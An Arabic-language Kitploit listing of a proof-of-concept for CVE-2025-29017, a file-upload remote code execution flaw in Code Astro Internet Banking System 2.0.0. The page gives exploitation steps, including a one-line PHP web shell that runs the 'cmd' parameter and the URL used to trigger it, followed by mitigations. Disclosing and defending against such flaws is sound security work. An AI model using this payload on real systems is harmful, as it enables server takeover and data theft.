Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-29017 — استغلال لإثبات المفهوم (PoC) لثغرة CVE-2025-29017، يوضح تنفيذ تعليمات برمجية عن بُعد عبر رفع ملف خبيث في نظام Code Astro Internet Banking System 2.0.0. | Kitploit
أدوات/GitHubGitHub/b1tm4r/cve-2025-29017
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubb1tm4r/cve-2025-29017

CVE-2025-29017

استغلال لإثبات المفهوم (PoC) لثغرة CVE-2025-29017، يوضح تنفيذ تعليمات برمجية عن بُعد عبر رفع ملف خبيث في نظام Code Astro Internet Banking System 2.0.0.

عرض المستودع
12منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-29017 - نظام الخدمات المصرفية عبر الإنترنت 2.0.0 تنفيذ أوامر عن بُعد عبر رفع صورة الملف الشخصي

الوصف

توجد ثغرة تنفيذ أوامر عن بُعد (RCE) في نظام Code Astro للخدمات المصرفية عبر الإنترنت 2.0.0 بسبب عدم التحقق السليم من صحة رفع الملفات في المعامل profile_pic داخل pages_view_client.php. يمكن للمهاجمين تجاوز فحوصات الأمان عن طريق تعديل طلب الرفع، مما يؤدي إلى تنفيذ تعليمات برمجية عشوائية.

المكون المتأثر

  • المعامل profile_pic في pages_view_client.php
  • وظيفة الرفع تسمح بتنفيذ ملفات PHP ضارة

خطوات الاستغلال

  1. انتقل إلى إعدادات الملف الشخصي للمستخدم وابحث عن صورة ملف شخصي جديدة.



  1. اعترض طلب رفع صورة الملف الشخصي باستخدام أداة مثل Burp Suite.


  1. عدّل الملف ليكون بامتداد مزدوج (.jpeg.php)، وعدّل رأس Content-Type إلى application/x-php، وأضف كود PHP ضار:
root@kitploit:~
<?php system($_GET['cmd']); ?>



  1. يمكنك التحقق من رفع الملف في المسار /admin/dist/img/:
root@kitploit:~
http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt


التأثير

  • اختراق الخادم بالكامل
  • سرقة البيانات
  • تصعيد الصلاحيات

التخفيف

  • قصر رفع الملفات على صيغ الصور فقط والتحقق من أنواع MIME.
  • تعقيم أسماء الملفات وحظر الملفات التي تحتوي على كود قابل للتنفيذ.
  • تخزين الملفات المرفوعة خارج جذر الويب.

المراجع

  • OWASP File Upload Security
تنزيل الأداة